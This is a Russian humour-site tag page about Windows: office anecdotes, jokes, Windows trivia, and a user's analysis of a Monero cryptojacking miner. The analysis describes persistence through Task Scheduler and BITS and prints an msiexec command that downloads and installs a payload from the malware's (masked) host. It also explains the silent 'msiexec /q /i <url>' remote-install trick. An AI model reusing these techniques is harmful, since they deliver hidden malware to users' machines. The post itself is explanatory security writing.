windows

Постов: 223 Рейтинг: 393611
10148

[моё] Ведьмак Windows

Развернуть

Заказчик написал с просьбой переустановить Windows в офисе. И тут приходит сообщение:

[моё] Ведьмак Windows

Видимо очень хорошая сотрудница

[моё] Ведьмак Windows
[моё] Ведьмак Windows

У нас в офисе на старой работе была традиция собирать деньги с сотрудников на День Рождения ,как правило такса была 200 - 300 рублей, пособирать со всех и сумма получалась неплохая , плюсом шло от предприятия ещё 3000 руб,всегда дарили деньгами, а потом в обед или под конец рабочего дня за час или полтора до окончания рабочего дня устраивали чаепитие с тортиками или небольшой фуршет .


Устроилась к нам одна девушка и на протяжении практически всего года также сдавала деньги на подарки, а перед Днём Рождения уходит в декрет .


Отступление:

Дни у кого когда День Рождения знали все т.к. информационный лист по датам всегда висел на информационном табло в офисе.А собирала финансы всегда секретарь Генерального директора.

Когда наступил День Рождения у ушедший в декрет ,задал секретарю простой вопрос:


Я: "А вы деньги не будете ей собирать , а то обычно за неделю сбор начинается?"

Секретарь: А зачем она же в декретный отпуск ушла .

Я: Так она же год практически сдавала нам всем на подарки ,деньги свои тратила ,не хорошо как то.

Секретарь : Так ведь ни фуршета ни банкета не будет , зачем скидываться,мы решили с девочками не сдавать.

Я: Жаль


Пришёл к мужикам в отдел ,рассказал об этом и решили раз девочки не хотят то мы скинулись и отправили  перед обедом к ней предварительно созвонившись и узнав точный адрес , с наказом по дороге цветов купить .


А по приезду как раз в обед привёз от неё подарок ,  беляшей штук 6 (впоследствии оказавшихся очень вкусными) ,небольшим тортиком и рассказом что муж чуть с лестницы не спустил когда дверь открыл и увидел мужика в костюме с галстуком и букетом цветов ,видимо приняв за кого то другого .


А в обед залетела одна из менеджеров где работала ушедшая в декрет и с вопросом:

Менеджер: "Что за праздник?"

А мы сидим чай пьём с тортиком , и получила ответ:

Мы: ваша сотрудница подарила которая в декрете.

Менеджер : А нам ничего не передала ,нехорошо так

Мы: Вот именно не хорошо (но имели ввиду совершенно другое,сарказм не прошёл)


После декрета кстати она так и не вышла к нам ,вряд ли думаю что из за этого случая,но факт остаётся фактом.

[моё] Ведьмак Windows

Отмечали перед Новым Годом 31.12.2019 последний день уходящего года в офисе (мини корпоратив для тех кто не пошел на основной в ресторан) , накрыли столы , нарезали закусок , налили стаканчики , руководители сказали пламенную речь и подарили премии в конвертах , все очень обрадовались и продолжили веселье . Погуляли , отдохнули и разбрелись пьяненькие по домам.

А вчера в первый рабочий день после праздников , одна дама с соседнего отдела закатила скандал , якобы у неё украли премию. Дошло до начальника охраны и решили посмотреть по камерам куда же делся конверт со стола.И выяснилось что эта мадам совместно с другими участниками мини корпоратива хорошо пьяненькие когда уже собирались домой решили прибраться со стола (убрать шкурки мандаринов,пустые бутылки ,горы салфеток и одноразовой посуды ) и собрав одноразовую скатерть в кучу вместе с конвертом , просто засунули в пакет и в мусорку.

Тут же она побежала в туалет в надежде что мусор так никто и не выкинул с 31 декабря. Да только ждало её разочарование , уборщица давно уже выкинула всё и теперь для неё уборщица враг номер один и второй день она достаёт всех с этой премией ...



Се Ля Ви...

Приезжал сегодня к нам на объект поставщик оборудования и рассказал про корпоратив на котором он был 13.12.2019 . Далее с его слов .


Решила наша контора сделать корпоратив , сняли помещение и пригласили всех сотрудников . При том явка была обязательна . Погуляли отлично , весело и здорово . Единственный минус , что немного раньше чем обычно , конкретного новогоднего настроения не было , хотя он так и назывался " Новогодний корпоратив 2019 " .


А сегодня в понедельник с утра в конторе на планёрке им объявили что с каждого удержат с зарплаты 2500 (две тысячи пятьсот) руб. за корпоратив , объяснив это тем что "Настали непростые времена , в  стране кризис и компания не может себе выделить деньги на оплату корпоратива" .


Т.е. получается сначала они оплатили , а теперь хотят с нас удержать .Мне не жалко этих денег , но зло берёт за то что :

-не сказали изначально что за наш счёт ;

-объявили что явка должна быть 100% (а 25% сотрудников вообще не хотели идти , они просто пришли на торжественную часть , а через 30 минут уехали домой , а теперь им ещё надо за это заплатить).


Теперь надо в нашей конторе узнать за чей счёт корпорат будет , а то может как у них , за наш ?

Среди специалистов по подбору персонала есть негласное правило - о прошлых компаниях говорят только хорошее или не говорят ничего. Но, так как я покинула это поприще, могу свободно рассказывать об изнанке профессии.


Знаю, для многих, собеседование с HR в компаниях - это целая карусель. Начиная от куриц, которые много мнят о себе и отказывают всем налево и направо, заканчивая совершенно неадекватными тётками с их тестами на десятки страниц. Конечно, есть и те, кто старается помочь соискателям в поиске работы. Первых, к сожалению, действительно в разы больше. Когда я искала работу, мне много раз присылали письма с вакансиями в разработке, хотя я занималась поиском разработчиков. Таких рекрутеров не останавливало, что в профиле написано, они просто делают рассылку "на всех", а там как пойдет.


Были действительно смешные собеседования, особенно попытки устроиться после универа. Но сейчас не об этом.

Я работала в компаниях, где всего 30-40 человек, но и в компаниях, где несколько тысяч сотрудников. И в тех, и других есть "особенные" сотрудники, а иногда, целые отделы. Мои истории как раз про то, когда рекрутер/HR оказывается в состоянии, когда невозможно что-то изменить в компании и приходится испытывать испанский стыд.

Не важно, как называется должность в компаниях - рекрутер/специалист по подбору/HR или кадровик, я просто расскажу о том, что обычно ими не публикуется. Расскажу про непростое взаимодействие с заказчиками.


Отказ кандидату по фотографии в резюме. Как-то раз мне пришлось отказать кандидату, потому что тим-лид бэкенд-разработки и человек из его команды, сказали, что у кандидата выражение лица, как "с банки тушенки", поэтому он нам не подходит. На тот момент, я уже поддерживала связь с кандидатом и по стеку/профессиональным качествам он был действительно подходящим. Они отказались от техсобеседования с ним и сказали, что я не понимаю профиль нужных им людей.


Отказ из-за работы на удаленке. Еще кандидатам в тот же самый отдел, приходилось отказывать из-за того, что он/она когда-то работали на удаленке и тим лиду, казалось, что поэтому они не впишутся в команду.


Отказ из-за отсутствия слова в резюме. Тот же самый отдел. В резюме кандидата не было указано, например, стек node.js, хотя, при общении с кандидатом, он упоминал, что работал в этой среде. Однако, тим лид решил, что стоит ему отказать, даже не пригласив на личную встречу, только из-за отсутствия данной технологии в резюме.


Вангование. Технический директор, хотя, я бы это позицию взяла в кавычки, так как поработав посредственным фронтом всего 3-4 года, кажется, что невозможно стать CTO, но некоторые компании это не останавливает. Так вот, последний этап - согласование оффера с этим самым CTO. Он с кандидатами не встречается обычно, слишком занятой, но вот когда очередь доходит до цифр в оффере, он подключается сразу, точнее, включает вангу. Одним только взглядом на резюме может сказать, достоит кандидат сумму N или недостоин. Каким образом, без технического собеседования и личной встречи, он решает это - загадка.


Танцы с бубном перед кандидатом. Одна из кандидаток на джуновую позицию, которую порекомендовал один из сотрудников, опять таки, в IT отдел, отказалась переезжать из другой страны, так как просто не готова к таким изменениям. Мы с ней приятно пообщались, поняли друг друга и остались поддерживать связь. Однако, это не поняли пару человек во главе с CTO. Как же так! Ее же порекомендовали! Моему руководителю, сказали, что я плохо представила компанию и не заманила ее всеми возможными путями к нам, как надо было. Вот они-то уж точно смогли бы это сделать, не то, что я. И конечно, они ничего так и не сделали.


Я написала лишь немногие истории, от которых или бомбило или преследовало чувство испанского стыда. Поэтому, не делайте всегда однозначные выводы о том, что "виноваты вот эти вот кадровички", что вы не попали в ту или иную компанию.

Перед тем, как выбрать место работы, обязательно встречайтесь с топами компании, руководителями отделов и спрашивайте о том, как они пришли к этой должности. Только так вы поймете, есть ли здравый смысл в компании или эти люди только делают вид, что что-то понимают.

Работаю в достаточно крупной компании. Не могу сказать, что я какой-то большой начальник, но небольшой штат из 6 человек у меня есть. И вот решил я одну девочку (назовём её Наташа) переквалифицировать на другую должность и сделать из неё что-то похожее на маркетолога. Почему? Только по тому, что людей которые могли выполнять её прежнюю работу было в избытке, а она отработала не один год и нужно было двигаться дальше.


Поговорив мы решили, что она пойдёт на специальные курсы и будет самостоятельно познавать все причуды мира маркетинга (не без моей помощи, конечно).


Прошло 2 месяца, в течение которых я ничего  от неё не требовал, но пришло время работать. Запускалась новая рекламная компания и наш основной маркетолог (Антон) нуждался в помощи. Естественно я отправил Наташу. Через 2 часа, в мой кабинет забежал Антон с криками: е..... вашу мать, кого ты мне подсунул. На мой скромный вопрос «А что случилось?» он ответил, что Наташа нулевая, курсы ей не помогли, она ведь даже не знает что такое UTM-метка.


Ей дали возможность учиться, давали отгулы, регулярно отпускали с работы раньше и платили увеличенную ЗП. Но вместо того, чтобы ходить на курсы, как выяснилось, Наташа накупила деловых костюмов, и бесконечно постила в Инстаграм фоточки с ноутбуком и кофейком из Старбакса. Позвонил в компанию, которые проводила обучение, Наташа за месяц посетила 2 занятия.


Мораль? Думаю и так всё ясно.


Первы пост. Не судите строго.

Хай всем, чё, кого?

Давно ничего не писал. Вот история вам на осмысление.

Смысла мало, буду очень краток.


К нам устроился паренек - манагер по продажам.

Очень необщительный, молчаливый - только здоровается.


Ездит этот парень на мерсе е200 новом.

(Остальные коллеги выше рав4 не прыгали)


____

Итог - весь офис обсуждает парня, что вот видите ли он такой пидор, весь из себя мажор, вряд ли вообще хоть копейку заработал сам, скорее всего родственник кого-то из руководителей, и вообще он мерзкий тип. Строят миллион догадок и всяких слухов.


Стоим в курилке, я подхожу к этому парню, познакомились (в разных отделах работаем).

Нормальный, абсолютно адекватный, скромный парень.


Спросил про тачку, он говорит - сам ездит на бэхе пятерке 96года, она в ремонте, вот взял машину старшего брата, пока он в отпуске, на месяц покататься. Брат бизнесмен, фрукты возит.


Это ведь так просто. Подошел - поинтересовался, пообщался.


Раздражают люди, которые из своей зависти и корысти готовы облить человека говном с ног до головы.

В одном очень маленьком филиале очень большой фирмы случилась неприятность: бухгалтер Анна забеременела. Поскольку Анна была не замужем, то никто не ожидал от неё такой подлости. Особенно расстроился начальник, Игорь Иванович Брахманов, т. к. Анна вела и белую бухгалтерию, и чёрную, и даже планировала его семейный бюджет. И вообще была единственным бухгалтером. Пришлось в срочном порядке искать замену.


Офисные дамы шушукались и нервничали. Их было немного, но окружающих мужчин было ещё меньше. Да и каких мужчин? Начальник слишком стар. Стажёр Костик — слишком молод. Сисадмин Володя не брился, не признавал моды и жил с мамой. Грузчик Валера не признавал трезвые вечера. А водитель Виталий вообще был женат! Единственным достойным кандидатом считался снабженец Александр.


Среднего роста, среднего возраста, средней внешности, но он был один. А достойных кандидаток как минимум восемь. Нет, с точки зрения среднестатистического мужчины, их было только четыре. Но женские требования в этом плане значительно мягче: и не считают, лишний вес или наличие ребёнка чем-то неприемлемым.


В любом случае, Александр был на расхват. Фактически его уже поделили, хоть он про это и не знал. У любой группы женщин стоит им собраться сразу же возникает орган власти. Иначе они передеруться. Этот орган и выработал календарь обработки Саши. Суть в том, что подкатывать к потенциальному жениху можно было ни когда захочется, а только по графику. Мелкие подкаты дважды в неделю. Крупные — два раза в месяц.


Уйдя в декрет, Анна мало того, что сломала весь график. Так ещё на её место могла прийти какая-нибудь прошмандовка и увести Александра.


Вскоре, маркетолог Даша и секретарь Маша решилась на отчаянный шаг. Под покровом обеденного перерыва, они пробрались в кабинет начальника и украли папку с резюме. После чего принесли её на женский совет.


Председательствовала зав-складом Валерия Сергеевна. Или просто Сергеевна. Она дважды была замужем, поэтому умела командовать. И, кстати, именно при помощи командного голоса и волевого характера добивалась Александра.


- София, - пробасила Сергеевна, - Начинай.


Пухленькая блондинка услужливо кивнула и достала достала первый документ. Она пыталась добиться расположение Саши при помощи домашних пирожков и маринованных грибочков.


Коллектив склонился над первой потенциальной работницей.


- У-у-у, наглая! - сразу заявила Марта, - Кто ж на резюме по пояс фотографируется? Это она нарочно, чтобы грудями похвастаться.


Марта ненавидела всех девушек, у которых грудь больше чем у неё. А так как у неё была единичка, максимум полторашечка, то ненавидела она почти всех.


- В урну, - скомандовала Сергеевна.


Вторая кандидатка была сфотографирована правильно: начиная от подбородка.


- Тьфу, шалава! - сделала вывод Даша.


- Почему?


- Посмотри, как открыто улыбается. Мол, «я вся такая доступная».


На самом деле, у второй девушки просто были хорошие зубы и правильный прикус, а зубы Даши намекали на родство с бобрами.


- И эту в урну! - вздохнула Сергеевна, - Девочки поменьше критики. Нам надо найти хоть кого-то.


Следующая фотография была почти идеальна. Идеально тем, что далеко не идеальна.


- В урну эту сучку! - пропищала Виктория.


- Почему?! Она же так себе. Нам нечего боятся.


- Да? А вы на адрес посмотрите.


- Куйбышева 12. Чёрт! Это ж…


- Прямо рядом с Сашей. Он будет её подвозить, - сделала вывод Сергеевна и выкинула резюме, - Дальше.


На четвёртой фотографии была обычная девушка, но…


- Посмотрите на увлечения! - подала голос Света.


- «Увлекаюсь ездой на велосипеде», - прочитала Виктория, - Ну и что?


- Ты что, дура? Саша обожает велики.


- Сама дура! Я не знала.


- Если бы поменьше трепалась про свои театры, то знала бы…


- Девочки, цыц! - рявкнула Сергеевна, - Света права. Никаких великов.


- Кто следующая?


Со следующей фотографии на них смотрела пятидесятилетняя бухгалтер.


- Эта подойдёт.


София отложила резюме в сторону.


Две следующих кандидатки тоже подошли. Они были не такого солидного возраста, зато были плотно замужем.


«Пловчиху» и «теннисистку» забраковали, но «штангистку» оставили. Еще общим голосованием согласились на двух «разведенок в возрасте» и одну миловидную даму с тремя детьми. Брюнетку с пирсингом Сергеевна смяла и выкинула лично. А «бывшую повариху» София выкинула тайком.


- Что за шум? - вдруг насторожилась Света.


- Быстрее, это Брахманов вернулся! - скомандовала Сергеевна, подталкивая всех к выходу, и, подхватив одобренных кандидатов, выбежала за остальными.


Сотрудники стояли кружком. Даша и Виктория чуть не стукнулись лбами, когда пробивались поближе к Александру. И наконец вошёл начальник, а следом за ним хорошо сложенный, симпатичный парень с безупречной осанкой.


- Знакомьтесь, - объявил Брахманов, - Наш новый бухгалтер Игорь.Игорь — это наш коллектив.


- Очень приятно, - красивым голосом отозвался парень и продемонстрировал всем белоснежную улыбку.


Женщины испустили дружный вздох.


- Тьфу! Вот наглый, - процедил сквозь зубы Александр, - Кто ж осенью в футболке ходит? Это он нарочно, чтобы бицепсами похвастаться.


Но его слова никто не услышал. Глаза женщин были затянуты мечтательной дымкой. Все до единой уже распланировали долгую и счастливую жизнь с Игорем.


А Сергеевна ещё и составила в уме новый календарь подкатов.


***


Если вам понравилось, то другие рассказы размещены тут.


Если нет, но у вас хватило сил дочитать до сюда, то... немного критики не помешает. Ещё два/три слова о недочётах недостатках. )

[моё] Ведьмак Windows
8333

Windows Свитер Длиннопост

Развернуть

В США есть традиция выпуска «уродливых свитеров» (ugly sweaters) к Рождеству, которую периодически подхватывают и крупные бренды. Microsoft — в числе них. 10 декабря компания начала рассылать журналистам, сотрудникам и партнёрам рождественские свитеры в стиле операционной системы Windows XP (надпись Professional поменяли на Pro-ho-ho-fessional (намёк на традиционное «Хо хо хо» Санта Клауса).


Хотели просто поржать, но читатели в комментах завалили компанию вопросами: а где купить?? Свитер разослали журналистам, подарок особенно пришёлся по душе олдфагам, ностальгирующим по безвременно почившей в бозе XP. Оказалось, таких много

Windows Свитер Длиннопост
Windows Свитер Длиннопост
Windows Свитер Длиннопост
Windows Свитер Длиннопост
Windows Свитер Длиннопост
8176

Windows Обновление Симпсоны

Развернуть
Windows Обновление Симпсоны
7546

ПК Windows Лайфхак

Развернуть
ПК Windows Лайфхак

🤩 Пользователи Stack Exchange рассказали, как дёрганье мышью на самом деле ускоряло работу в Windows 95

В Windows 95 использовали приоритетную многозадачность: система сама принимала решения о переключении между задачами. При этом ОС обрабатывала события циклами: задачи ввода-вывода данных исполнялись сразу, а на фоновые задачи выделялось одинаковое количество времени — 15,6 миллисекунды.

Если программе нужно было, к примеру, скопировать файлы, система ставила запрос в очередь, ожидала наполнения буфера фоновыми задачами, и только после этого обрабатывала весь пакет. При этом пока задача находилась в режиме ожидания — приложение фактически не работало.
Двигая курсором мыши, пользователи заполняли буфер входящими событиями, заставляя систему перезапускать цикл. Это и создавало эффект, что программа работает быстрее.

30

Microsoft Windows Windows 7 blue background

Развернуть
Microsoft Windows Windows 7 blue background
90

Xbox Xbox One Xbox 360

Развернуть
Xbox Xbox One Xbox 360
7258

[моё] Трактор Харвестер

Развернуть

Еду в лес устанавливать windows на трактор.

[моё] Трактор Харвестер
[моё] Трактор Харвестер
120

Microsoft Windows

Развернуть
Microsoft Windows
60

Microsoft Windows

Развернуть
Microsoft Windows
7049

Внезапно.

Развернуть
Внезапно.
150

Microsoft Windows paint splatter monochrome

Развернуть
Microsoft Windows paint splatter monochrome
150

Microsoft Windows Windows 10

Развернуть
Microsoft Windows Windows 10
2115

DETROIT BECOME HUMAN

Развернуть
DETROIT BECOME HUMAN
6053

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Развернуть

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.
Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

360

Abstract Microsoft Windows logo

Развернуть
Abstract Microsoft Windows logo
136

Abstract colorful windows10

Развернуть
Abstract colorful windows10
210

Microsoft Windows operating system Windows 10

Развернуть
Microsoft Windows operating system Windows 10
60

Windows 10 Microsoft Windows operating systems

Развернуть
Windows 10 Microsoft Windows operating systems
6738

На этой неделе исполнилось 20 лет самому известному "синему экрану смерти"

Развернуть

Курьёз произошёл в 1998 году во время презентации Windows 98 на конференции COMDEX.


Компьютер выдал  синий экран смерти (BSOD) при подключении периферийного устройства, вызвав смех и издевку со стороны аудитории.


Но Билл, Гейтс отлично справился с ситуацией, пошутив: «Должно быть именно поэтому мы еще официально не продаём Windows 98».

60

Windows 7 Microsoft Windows operating systems

Развернуть
Windows 7 Microsoft Windows operating systems